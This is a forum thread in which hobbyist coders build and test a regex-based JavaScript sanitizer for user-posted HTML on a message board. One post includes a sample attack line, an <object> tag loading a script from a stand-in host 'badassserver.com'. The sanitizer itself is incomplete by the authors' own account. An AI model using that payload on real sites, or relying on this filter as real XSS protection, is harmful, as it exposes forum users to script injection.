first test

Bones
Code Helper

Posts: 131
Bones said 0 great things

first test Mar 6, 2011 18:22:49 GMT -8

Quote

Post by Bones on Mar 6, 2011 18:22:49 GMT -8

I've decided to abandon this code since it is becoming painfully obvious that by trying to weed out the potentially harmful parts of HTML and also account for mistakes in the input HTML the code grows larger and larger and even more disappointing... slower. Currently it is taking a full 9 seconds to render the dohtml tags on the first page of this thread and even with optimizations I can only shave 2 seconds off.

I've totally rewritten the code to offload all those decisions about markup mistakes on the browser and instead concentrate on security

<script type="text/javascript">
(function doHTML(){
//doHTML (v0.3.00)
if(!/(display|(pm|calendar|pre)view|search|recent)/.test(pb_action))return;
if("undefined" == typeof(arguments.callee.defer))arguments.callee.defer=[];
var parser = {
	sandbox:(function sandBox(){
		var div = document.createElement('div')
		div.parse=function parse(htm,keepEvents){ var y
			htm = deEntify(htm).replace(/<(\/)?(script|object|applet)/gi,"&"+"lt;$1$2"); //still allows the rigidly define <embed> tag which doesn't vary from app to app like object
			htm = htm.replace(/(src|href)\s*=\s*['"]?([^\s]+)/gi,function checkURI(m,p,p1,index,txt){
				//p=p.toLowerCase();
				if(/^#/.test(p1))return m;
				//if(p=="data" && !/^(object|applet)\s/i.test(text.substr(0,index).split('<').pop()))return m
				if(!/^(ht|f)tps?:/i.test(p1))return m.replace(p1,'');
				return m;
			})
			if(!keepEvents)htm = htm.replace(/\bon(\w+)=/g,"no$1=");
			this.innerHTML =  htm
			parser.html = arguments.callee.innerHTML = this.innerHTML;
			parser.nodes = document.createDocumentFragment()
			for(y=0;y<this.childNodes.length;y++)parser.nodes.appendChild(this.childNodes[y]);
			arguments.callee.nodes = parser.nodes;
			return arguments.callee
		}
		return div;
	})()
}
var defer = arguments.callee.defer;

function deEntify(txt){
	var entity = {'lt':'<','gt':'>','amp':'&'},convert=arguments.callee.convert	
	txt = txt.replace(/%(?![0-9a-fA-F])/g,'\x07');
	try{(function URIDec(){txt=decodeURIComponent(txt);})()}catch(e){return e.message||e}
	txt = txt.replace(/\x07/g,'%');
	if(convert){convert.innerHTML=txt; return convert.value;}
	if(/&(#(x)?([a-f0-9]+)|lt|gt|amp);/i.test(txt))
	txt=txt.replace(/&(#(x)?([a-f0-9]+)|lt|gt|amp);/gi, function regDeEntifyHTML(m,p,p1,p2){
		if(entity[p])return entity[p];
		return String.fromCharCode(parseInt(p2,(p1.length?16:10)))
	}); 
	return txt;
}
deEntify.convert = document.createElement('textarea'); 
try{deEntify.convert.innerHTML = "&"+"lt"+";test&"+"gt"+"; &"+"#x"+"5d;"; if(deEntify.convert.value!="<test> ]")deEntify.convert=null;}catch(e){deEntify.convert=null;}
for (var tds=defer.length?defer:document.getElementsByTagName('td'), i=0; i<tds.length; i++) {
    if (tds[i].width=="80%" && tds[i].className.match(/windowbg/) && tds[i].vAlign=="top" && tds[i].innerHTML.match(/\[dohtml(\s*defer\s*)?\]([\s\S]*?)\[\/dohtml\]/i) ) {
		for(var dotab = tds[i].getElementsByTagName('table'),fi=0;fi<dotab.length;fi++){
			if(/\b(quote)\b/.test(dotab[fi].className) && dotab[fi].innerHTML.match(/\[dohtml(\s*defer\s*)?\]([\s\S]*?)\[\/dohtml\]/i)){
				if(RegExp.$1.indexOf('defer')!=-1 && !/\b(defer)\b/.test(dotab[fi].className)){defer.push(tds[i]);dotab[fi].className+=" defer";continue;}
				var htm = dotab[fi].rows[0].cells[0].firstChild,html;
				//note: some browsers no longer allow full innerHTML access to textareas (webkit?)
				if((html=htm.getElementsByTagName('textarea')) && html[0]){
					htm=html[html.length-1].innerHTML;
				}else htm=htm.innerHTML.split(/<br\s*\/?>/i).join('');
				html = parser.sandbox.parse(htm.replace(/^[\s\S]*\[dohtml(\s*defer\s*)?\]/i,"").replace(/\[\/dohtml(\s*defer\s*)?\][\s\S]*$/i,"")).innerHTML; isError=false;
				var dohtml=document.createElement('div'); dohtml.innerHTML = (isError?htm.replace(/</g,'&l'+'t;')+ '\n\n\nUNABLE TO CONVERT DOHTML':(html)); 
				dotab[fi-1].parentNode.parentNode.replaceChild(dohtml,dotab[fi-1].parentNode);fi-=2;
				
				
			}
		}
	}
}
if(defer.length) (window.addEventListener||window.attachEvent)((window.addEventListener?'':'on')+'load',arguments.callee,false)
})()
</script>

Last Edit: Mar 12, 2011 12:48:26 GMT -8 by Bones

Wormopolis Administrator Code Monkey Posts: 6,538 Wormopolis said 79 great things	first test Mar 7, 2011 0:03:15 GMT -8 Quote Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by Wormopolis on Mar 7, 2011 0:03:15 GMT -8 new version loaded into this board footer
	[smear:0044FF]The worms crawl in, the worms crawl out[/smear:AAAA00]

Wormopolis Administrator Code Monkey Posts: 6,538 Wormopolis said 79 great things	first test Mar 7, 2011 0:17:48 GMT -8 Quote Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by Wormopolis on Mar 7, 2011 0:17:48 GMT -8 interesting.. it took tumbleweeds profile that you recreated in that post in the first page and my footer codes applied to it like it was totally normal
	[smear:0044FF]The worms crawl in, the worms crawl out[/smear:AAAA00]

Bones
Code Helper

Posts: 131
Bones said 0 great things

first test Mar 7, 2011 12:28:20 GMT -8

Quote

Post by Bones on Mar 7, 2011 12:28:20 GMT -8

0.95 seconds rendering time (not including google maps and PDF plugin initialization and content download time), now that's more like it!!

Mar 7, 2011 0:17:48 GMT -8 Wormopolis said:

interesting.. it took tumbleweeds profile that you recreated in that post in the first page and my footer codes applied to it like it was totally normal

It also affects your PBS mini-profile posted in reply 12

How is IE7 on XP handling the new code btw?
You'll notice that the HTML errors the previous code was fixing up is no longer being handled, firefox at least has an interesting interpetation of

HTML:

<table style="width: 183px; border:1px solid #000000; border-collapse:collapse;" cellpadding=4; border=1px solid #000000>

This is how it interprets that nonsense
HTML:

<table cellpadding="4;" border="1px" #000000="" solid="" style="border: 1px solid rgb(0, 0, 0); border-collapse: collapse;">

wth happened to width?

Well I'm not worried about it, if the user wants correct rendering then use correct HTML.

As before, the code disallow all <script> tags and events (onclick, onmouseover,etc.). Object and Applet tags are also disallowed since they vary too greatly depending on plugin as to what constitutes the active URI, <embed> tags are however allowed since it has a uniform URI designator (src). Objects and Applets will have to be converted to their embed equivalent to render.

Last Edit: Mar 7, 2011 13:38:39 GMT -8 by Bones

Wormopolis Administrator Code Monkey Posts: 6,538 Wormopolis said 79 great things	first test Mar 7, 2011 15:44:24 GMT -8 Quote Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by Wormopolis on Mar 7, 2011 15:44:24 GMT -8 what about iframes?
	[smear:0044FF]The worms crawl in, the worms crawl out[/smear:AAAA00]

Wormopolis
Administrator

Code Monkey

Posts: 6,538
Wormopolis said 79 great things

first test Mar 7, 2011 15:49:13 GMT -8

Quote

Post by Wormopolis on Mar 7, 2011 15:49:13 GMT -8

Firefox 3.6.15) is working still for me on XP. IE no longer leaves the entire post as the HTML with the message (could not interpret HTML) or whatever it was before. now it just leaves the entire dohtml in a code box.. which my code box mod transforms into the standard scrolling div now. bottom bar reports "unknown runtime error".. which is cryptic at the very least. I have the IE developer addon for IE, but I dont think it has a debugger.

[smear:0044FF]The worms crawl in, the worms crawl out[/smear:AAAA00]

Bones
Code Helper

Posts: 131
Bones said 0 great things

first test Mar 7, 2011 18:39:12 GMT -8

Quote

Post by Bones on Mar 7, 2011 18:39:12 GMT -8

Mar 7, 2011 15:44:24 GMT -8 Wormopolis said:

what about iframes?

Reply #13 (the google map) is an iframe.

Mar 7, 2011 15:49:13 GMT -8 Wormopolis said:

Firefox 3.6.15) is working still for me on XP. IE no longer leaves the entire post as the HTML with the message (could not interpret HTML) or whatever it was before. now it just leaves the entire dohtml in a code box.. which my code box mod transforms into the standard scrolling div now. bottom bar reports "unknown runtime error".. which is cryptic at the very least. I have the IE developer addon for IE, but I dont think it has a debugger.

Does it at least give a line number when you click on the error for more details?
If you have M$ Office installed you can use the VBA debugger in there to debug javascript in IE.

EDIT:

I forgot to make the regex in this line case-insensitive

}else htm=htm.innerHTML.split(/<br\s*\/?>/i).join('');

I've modified the code try it on IE now

Last Edit: Mar 7, 2011 19:00:11 GMT -8 by Bones

Wormopolis Administrator Code Monkey Posts: 6,538 Wormopolis said 79 great things	first test Mar 8, 2011 23:42:29 GMT -8 Quote Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by Wormopolis on Mar 8, 2011 23:42:29 GMT -8 all of them except reply #14 are working in chrome
	[smear:0044FF]The worms crawl in, the worms crawl out[/smear:AAAA00]

Wormopolis Administrator Code Monkey Posts: 6,538 Wormopolis said 79 great things	first test Mar 8, 2011 23:45:27 GMT -8 Quote Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by Wormopolis on Mar 8, 2011 23:45:27 GMT -8 changing that regexp fixed it for IE as well
	[smear:0044FF]The worms crawl in, the worms crawl out[/smear:AAAA00]

Bones
Code Helper

Posts: 131
Bones said 0 great things

first test Mar 9, 2011 15:08:09 GMT -8

Quote

Post by Bones on Mar 9, 2011 15:08:09 GMT -8

Mar 8, 2011 23:42:29 GMT -8 Wormopolis said:

all of them except reply #14 are working in chrome

Chrome comes with its own built-in PDF viewer which I'm not too enthusiastic about since it has given me a few problems with PDFs. By default the internal PDF viewer is enabled and the external adobe plugin is disabled, if you type chrome:plugins in the browser you can see which one you have running, I usually have Adobe's version running.

Edit: after some research I'm satisfied that all major browsers will display rather than execute any attempt to load a script using the <object> tag so I think I'll allow it in the code (still have to do some tests on <applet>)

Last Edit: Mar 9, 2011 17:00:07 GMT -8 by Bones

Wormopolis Administrator Code Monkey Posts: 6,538 Wormopolis said 79 great things	first test Mar 9, 2011 17:05:52 GMT -8 Quote Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by Wormopolis on Mar 9, 2011 17:05:52 GMT -8 what about instead of displaying the script it just posts a message that a script was attempted to be embedded?
	[smear:0044FF]The worms crawl in, the worms crawl out[/smear:AAAA00]

Bones
Code Helper

Posts: 131
Bones said 0 great things

first test Mar 9, 2011 17:55:23 GMT -8

Quote

Post by Bones on Mar 9, 2011 17:55:23 GMT -8

Mar 9, 2011 17:05:52 GMT -8 Wormopolis said:

what about instead of displaying the script it just posts a message that a script was attempted to be embedded?

nope, not venturing down that road again...only focus is security.
Content rendering will be left to the discretion of the browser. So if a user wants to be cute and try to load a script inside a post to do something to everybody that views the thread:

<object data="http://badassserver.com/exploits/stealth.js" type="text/javascript" width="300" height="200">
  Have a nice day!
</object>

It won't work.

My concern was the behavior of the browser in such a situation and in all cases they either show the script as plain text or degrade to the fallback ("Have a nice day!").

Bones
Code Helper

Posts: 131
Bones said 0 great things

first test Mar 12, 2011 12:56:37 GMT -8

Quote

Post by Bones on Mar 12, 2011 12:56:37 GMT -8

Updated the code to use [quote] tags instead of [code] tags since it has come to my attention that doHTML implementations traditionally allow mixing UBBC with HTML.

Usage has changed from
[code][dohtml]HTML GOES HERE[/dohtml][/code]
to
[quote][dohtml]HTML GOES HERE[/dohtml][/quote]

change to code is simple:
if(/\b(quote)\b/.test(dotab[fi].className) && dotab[fi].innerHTML.match(/\[dohtml(\s*defer\s*)?\]([\s\S]*?)\[\/dohtml\]/i)){

As before, if there is a quote remodel installed this code would need to run before that remodel occurs.

Bones
Code Helper

Posts: 131
Bones said 0 great things

first test Mar 14, 2011 10:31:54 GMT -8

Quote

Post by Bones on Mar 14, 2011 10:31:54 GMT -8

[dohtml]<object width="425" height="355"><param value="internal" name="allownetworking"><param value="http://www.youtube.com/v/Sy7BaSUDObs&hl=en" name="movie"><param value="transparent" name="wmode"><embed width="425" height="355" wmode="transparent" type="application/x-shockwave-flash" src="http://www.youtube.com/v/Sy7BaSUDObs&hl=en" allownetworking="internal"></object>[/dohtml]

Gotta add a youtube disable in the code to be in compliance with TOS

Bones
Code Helper

Posts: 131
Bones said 0 great things

first test Mar 14, 2011 10:50:08 GMT -8

Quote

Post by Bones on Mar 14, 2011 10:50:08 GMT -8

[dohtml]<table class="showmeie" ><tbody><tr><td width="100%" valign="top">
      <br/>
<a class="nav" href="/index.cgi">ProBoards® Support</a> :: View Profile: Patrick Clinger<br/><table class="showmeie" width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#000000" class="bordercolor"><tbody><tr><td><table class="showmeie" width="100%" cellspacing="1" cellpadding="4" border="0"><tbody><tr><td bgcolor="#4080b0" colspan="2" class="titlebg"><font size="-1" color="#mcLarenmcLarenmcLaren" class="titletext"><img border="0" alt=" " src="http://s3.images.proboards.com/profile.gif"/> <b>View Profile: Patrick Clinger</b> (username: admin)</font></td></tr><tr><td width="20%" valign="top" bgcolor="#efefef" class="windowbg"><b><a class="group1" href="http:support.proboards.com/index.cgi?action=viewprofile&user=admin"><font color="#e3170d">Patrick Clinger</font></a></b><br/>ProBoards.com Staff<br/><img border="0" alt="*" src="http://support.proboards.com/stars/star_red.png"/><img border="0" alt="*" src="http://support.proboards.com/stars/star_red.png"/><img border="0" alt="*" src="http://support.proboards.com/stars/star_red.png"/><img border="0" alt="*" src="http://support.proboards.com/stars/star_red.png"/><img border="0" alt="*" src="http://support.proboards.com/stars/star_red.png"/><br/>member is offline<br/><br/><center><img width="62" height="74" border="0" alt="avatar" src="http://www.proboards.com/images/patrick8.jpg"/><br/><br/><br/><a target="_blank" href="http://www.patrickclinger.com/"><img border="0" alt="homepage" src="http://s3.images.proboards.com/buttons/www_sm.gif"/></a> <a href="/index.cgi?action=pmsend&to=admin"><img border="0" alt="send pm" src="http://s3.images.proboards.com/buttons/message_sm.gif"/></a> </center><br/>Joined: Dec 1999<br/>Gender: Male <img border="0" alt=" " src="http://s3.images.proboards.com/male.gif"/><br/>Posts: 8,723<br/>Location: Foothill Ranch, CA<br/></td><td width="80%" valign="top" bgcolor="#efefef" class="windowbg"><font size="2"><table class="showmeie" width="100%" cellspacing="1" cellpadding="4" border="0"><tbody><tr><td colspan="2"><font size="2"><b>Member's Bio - <a href="http:support.proboards.com/index.cgi?action=pmsend&to=admin">Send Personal Message</a></b><hr size="1"/></font></td></tr><tr><td width="25%"><font size="2">Name:</font></td><td><font size="2">Patrick Clinger</font></td></tr><tr><td width="25%"><font size="2">Email:</font></td><td><font size="2"><i>hidden</i></font></td></tr><tr><td width="25%"><font size="2">Web Site:</font></td><td><font size="2"><a target="_blank" href="http://www.patrickclinger.com/">Patrick Clinger . com</a></font></td></tr><tr><td width="25%"><font size="2">Birthday:</font></td><td><font size="2">12/28/1982</font></td></tr><tr><td width="25%"><font size="2">Age:</font></td><td><font size="2">25</font></td></tr><tr><td width="25%"><font size="2">Gender:</font></td><td><font size="2">Male</font></td></tr><tr><td width="25%"><font size="2">Location:</font></td><td><font size="2">Foothill Ranch, CA</font></td></tr><tr><td width="25%"><font size="2">Posts:</font></td><td><font size="2">8,723</font></td></tr><tr><td width="25%"><font size="2">Date Registered:</font></td><td><font size="2">Dec 25, 1999, 10:34pm</font></td></tr><tr><td width="25%"><font size="2">Account Status:</font></td><td><font size="2">Activated</font></td></tr><tr><td height="5" colspan="2"/></tr><tr><td colspan="2"><font size="2"><b>Recent Activity</b><hr size="1"/></font></td></tr><tr><td width="25%"><font size="2">Last Login Date:</font></td><td><font size="2"><b>Today</b> at 10:38pm</font></td></tr><tr><td width="25%" valign="top" rowspan="6"><font size="2">Recent Posts:</font></td><td valign="top"><font size="2"/><form onsubmit="disable(this)" method="post" action="/index.cgi?action=userrecentposts&user=admin"><font size="2">View <input type="text" maxlength="4" value="10" size="3" name="maxresults"> most recent posts. <input type="submit" value="Submit"></font></form></td></tr><tr><td valign="top"><font size="2"><a href="http://support.proboards.com/index.cgi?action=gotopost&board=support&thread=257549&post=2764418">Re: Select Forum Category</a> <b>Today</b> at 10:14pm</font></td></tr><tr><td valign="top"><font size="2"><a href="http://support.proboards.com/index.cgi?action=gotopost&board=support&thread=257532&post=2764390">Re: How about some different forum category choice</a> <b>Today</b> at 10:03pm</font></td></tr><tr><td valign="top"><font size="2"><a href="http://support.proboards.com/index.cgi?action=gotopost&board=support&thread=257549&post=2764330">Re: Select Forum Category</a> <b>Today</b> at 9:40pm</font></td></tr><tr><td valign="top"><font size="2"><a href="http://support.proboards.com/index.cgi?action=gotopost&board=support&thread=257558&post=2764277">Re: Select Forum Category Stays</a> <b>Today</b> at 9:18pm</font></td></tr><tr><td valign="top"><font size="2"><a href="http://support.proboards.com/index.cgi?action=gotopost&board=support&thread=257531&post=2764271">Re: Forum Classification Notice & Selection</a> <b>Today</b> at 9:14pm</font></td></tr><tr><td height="5" colspan="2"/></tr><tr><td colspan="2"><font size="2"><b>Signature</b><hr size="1"/></font></td></tr><tr><td colspan="2"><font size="1"><a target="_blank" href="http://blog.proboards.com/2008/06/recent-events-data-center-explosion-and.html"><img border="0" alt="image " src="http://blog.proboards.com/survivor.jpg"/></a><br/><b>I blame Shady. Do you?</b><br/><font size="1"><a target="_blank" href="http://my.barackobama.com/page/outreach/view/main/proboards">Barack Obama '08 - Donate!</a></font><br/></font></td></tr></tbody></table></font></td></tr></tbody></table></td></tr></tbody></table>       <table class="showmeie" width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td align="right"><select onchange="if(this.optionsthis.selectedIndex.value) window.location=this.optionsthis.selectedIndex.value;" id="forumjump"><option value="">Forum Jump</option><option value="">--------------------</option><option value="/index.cgi">» Home</option><option value="">--------------------</option><option value="/index.cgi#general">» ProBoards</option><option value="">--------------------</option><option value="/index.cgi?board=status">- Network Status / Server Status</option><option value="/index.cgi?board=support">- Support Board</option><option value="/index.cgi?board=45bugs"> --- Bug Reporting</option><option value="/index.cgi?board=suggestions">- Suggestions Forum</option><option value="/index.cgi?board=suggestions1"> --- Accepted</option><option value="/index.cgi?board=suggestions2"> --- Rejected</option><option value="">--------------------</option><option value="/index.cgi#temptest">» Testing</option><option value="">--------------------</option><option value="/index.cgi?board=tests">- Testing Forum</option><option value="">--------------------</option><option value="/index.cgi#misc">» General</option><option value="">--------------------</option><option value="/index.cgi?board=promotion">- Discussion: Your ProBoard</option><option value="/index.cgi?board=opinions">- Get Opinions About Your Board</option><option value="/index.cgi?board=pbadvertise">- Your Board: Advertise</option><option value="/index.cgi?board=design">- Coding and Design Boards</option><option value="/index.cgi?board=programming"> --- General Programming Discussion</option><option value="/index.cgi?board=codedatabase"> --- Code Database</option><option value="/index.cgi?board=codesupport"> --- Coding Support</option><option value="/index.cgi?board=graphicsdiscussion"> --- Graphic Design Discussion</option><option value="/index.cgi?board=gdr"> --- Graphic Design Requests</option><option value="/index.cgi?board=v5coding"> --- ProBoards Version 5 Coding Changes</option><option value="/index.cgi?board=pbgt">- General Talk</option><option value="/index.cgi?board=gtwelcome"> --- Welcome</option><option value="/index.cgi?board=gtsub1"> --- Debates</option></select></td></tr></tbody></table>
    </td></tr></tbody></table>[/dohtml]

Need to fix protocol check to account for relative URLS

Last Edit: Mar 14, 2011 10:53:29 GMT -8 by Bones